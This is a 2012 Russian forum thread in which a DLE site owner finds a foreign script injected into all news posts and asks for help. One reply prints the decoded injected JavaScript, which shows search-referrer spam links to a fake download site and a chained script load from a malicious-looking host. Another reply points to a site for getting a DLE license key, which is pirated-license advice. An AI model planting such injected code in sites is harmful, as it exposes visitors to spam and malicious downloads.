[X] Помощник

[LimmiFox Topic Starter]

Есть у меня хороший сайт, новостной на dle. Нравится он мне, для души пишу на нем.

И вот сегодня чисто случайно заглянула в одну из старых новостей и увидела что в конце новости такой вот скриптик: <script type="text/javascript" src="http://rapidashare-parking.ru/id68905.js"></script>

Смотрю другие новости - везде такое. Умом понимаю, что кто - то что - то мне залил, но не пойму что это, зачем и как... Подкиньте мне пару умных мыслей, плиззз...

Сообщение отредактировал LimmiFox - 31.1.2012, 23:22

[shansick]

Это полюбому SQL инекция. Других вариантов такой хни... в моей практике нету! Все время заливали либо JS левый либо ссылки в новости только через инекции!

P.S. Смотрите дыры в левых модулях установленных, если таких нету то это опять какая то дыра в ДЛЕ! Напишите версию!

Сообщение отредактировал shansick - 31.1.2012, 23:27

[LimmiFox Topic Starter]

Это полюбому SQL инекция. Других вариантов такой хни... в моей практике нету! Все время заливали либо JS левый либо ссылки в новости только через инекции!

P.S. Смотрите дыры в левых модулях установленных, если таких нету то это опять какая то дыра в ДЛЕ! Напишите версию!

Версия 9.2 лицензия. Был модуль переходов, от него однажды получила кучу ссылок спрятанных в новости, после того случая все удалила и все почистила.

Сейчас левых модулей нет.

P.S учитывая тот факт, что поисковики упорно молчат про этот скрипт, то походу я единственный счастливчик, который подхватил эту хрень... Хоть в чем - то я первая

Сообщение отредактировал LimmiFox - 31.1.2012, 23:37

[shansick]

Версия 9.2 лицензия.

Срочно обновитесь до актуальной, хотя бы до 9.4 + почитайте на офф сайте о всех дырах и закройте их. Тут еще играет роль если этот код просто засунули в шаблон полной новости то тогда где то у вас шел есть, если все файлы чисты то тогда только инъекция...

P.S. Щас прошерстил выдачу, нигде эта JS дрянь не встречалась даже в индексе выдачи вашего сайта. Так что вы правы вы первая кто удостоился чести поймать эту заразу!

Сообщение отредактировал shansick - 31.1.2012, 23:41

[LimmiFox Topic Starter]

Срочно обновитесь до актуальной, хотя бы до 9.4 + почитайте на офф сайте о всех дырах и закройте их. Тут еще играет роль если этот код просто засунули в шаблон полной новости то тогда где то у вас шел есть, если все файлы чисты то тогда только инъекция...

Проблема в том, что для актуальной версии нет нормального лича, поэтому я сижу на 9.2 Дыры вроде как полатала еще в самом начале. Естьу меня еще один сайт на этой же версии дле, там все нормально.

Ладно, смотрю пока и пытаюсь понять как засунули....

P.S жалко, что за первенство ничего хорошего не присуждают

Сообщение отредактировал LimmiFox - 31.1.2012, 23:42

[shansick]

Могу дать вам ссыль на архив хеш совпадает с офф сайтом, дальше просто топаете на dlekey.cn там получаете свой код и юзаете в свое удовольствие!

[LimmiFox Topic Starter]

Могу дать вам ссыль на архив хеш совпадает с офф сайтом, дальше просто топаете на dlekey.cn там получаете свой код и юзаете в свое удовольствие!

Дык у меня лицензия, кей есть. Пока не хочу менять версию дле. Но если именно в этом причина - то придется. Пока разбираюсь.

Код скрипта еще и зашифрован был, вроде его расшифровала, но к сожалению мозгов не хватает, чтобы понять, что он делает... То ли он кого - то продвигает, то ли он мне гадит...

[House]

Если дадите url сайта и названия плагинов, возможно найду sql-инъекцию, если будет время.

Что делает ваш скрипт? Хм.. За это мне люди деньги платят...

document.write(unescape("<script type="text/javascript">
BCB = {};
BCB.r_tds = false;
BCB.f_tds = false;
BCB.a_s = false;
BCB.ses = [
[/google\./i, /(\?|&)q=(.*?)(&|$)/i, 2],
[/search\.yahoo\./i, /(\?|&)p=(.*?)(&|$)/i, 2],
[/bing\.com/i, /(\?|&)q=(.*?)(&|$)/i, 2],
[/search\.aol\./i, /(\?|&)q=(.*?)(&|$)/i, 2],
[/ask\.com/i, /(\?|&)q=(.*?)(&|$)/i, 2],
[/altavista\./i, /(\?|&)q=(.*?)(&|$)/i, 2],
[/search\.lycos\./i, /(\?|&)query=(.*?)(&|$)/i, 2],
[/alltheweb\./i, /(\?|&)q=(.*?)(&|$)/i, 2],
[/yandex\./i, /(\?|&)text=(.*?)(&|$)/i, 2],
[/(nova\.|search\.)?rambler\./i, /(\?|&)query=(.*?)(&|$)/i, 2],
[/gogo\./i, /(\?|&)q=(.*?)(&|$)/i, 2],
[/go\.mail\./i, /(\?|&)q=(.*?)(&|$)/i, 2],
[/nigma\./i, /(\?|&)s=(.*?)(&|$)/i, 2]
];
BCB.BCB = function(ref) {
var q=null;

for(var i=0; i<BCB.ses.length; i++) {
var se = BCB.ses[i];
if (ref.match(se[0])) {
q = ref.match(se[1]);
if (q) q = q[se[2]];
break;
}
}

var referer="Y";
if (referer=="N") {
q=document.title;

}

if (q) {

q=document.title;
var q_array = q.split(" »");
var q = q_array[0];

var c_url='http://rapidsshare.uni.me/?wkey=68905&query='+(encodeURIComponent(q));

document.write('<style>.module-one-search img {display:block;}.module-one-search {height:112px;margin:6px;font:bold 16px Arial;background:#fefefe url(http://img291.imageshack.us/img291/3307/blbg.gif) repeat-y 100% 0;border:1px solid #fefefe;border:1px solid #ccc;}.module-one-search a {color:#007ecb;}.module-one-search span {display:block;color:#464646;font:12px Arial;text-transform:uppercase;}.module-one-search .module-bg {height:72px;padding:40px 100px 0 131px;background:url(http://img19.imageshack.us/img19/9311/blbgl.gif) no-repeat 14px 16px;}</style><div class="module-one-search"><div class="module-bg">Скачать <a href="'+c_url+'" target="_blank"><b>'+q+'</b></a> прямая ссылка</div></div>');//e
}
};
BCB.BCB(document.referrer);
</script><script type="text/javascript" src="http://mobileeasier.ce.ms/r.php?go=http://mobileeasier.ce.ms/jar/%3Ff%3D4361%26m%3D0"></script>"))

[shansick]

я так понял вы расшифровали тот JS скрипт?

[LimmiFox Topic Starter]

Если дадите url сайта и названия плагинов, возможно найду sql-инъекцию, если будет время.

Что делает ваш скрипт? Хм.. За это мне люди деньги платят...

Скинула в личку...

Хм...или Вы - маг и волшебник, или я балда... именно эта лабуда в коде...

я так понял вы расшифровали тот JS скрипт?

А вон выше, House код написал. Таки я понимаю, что кто - то себя раскручивает...

Сообщение отредактировал LimmiFox - 1.2.2012, 0:10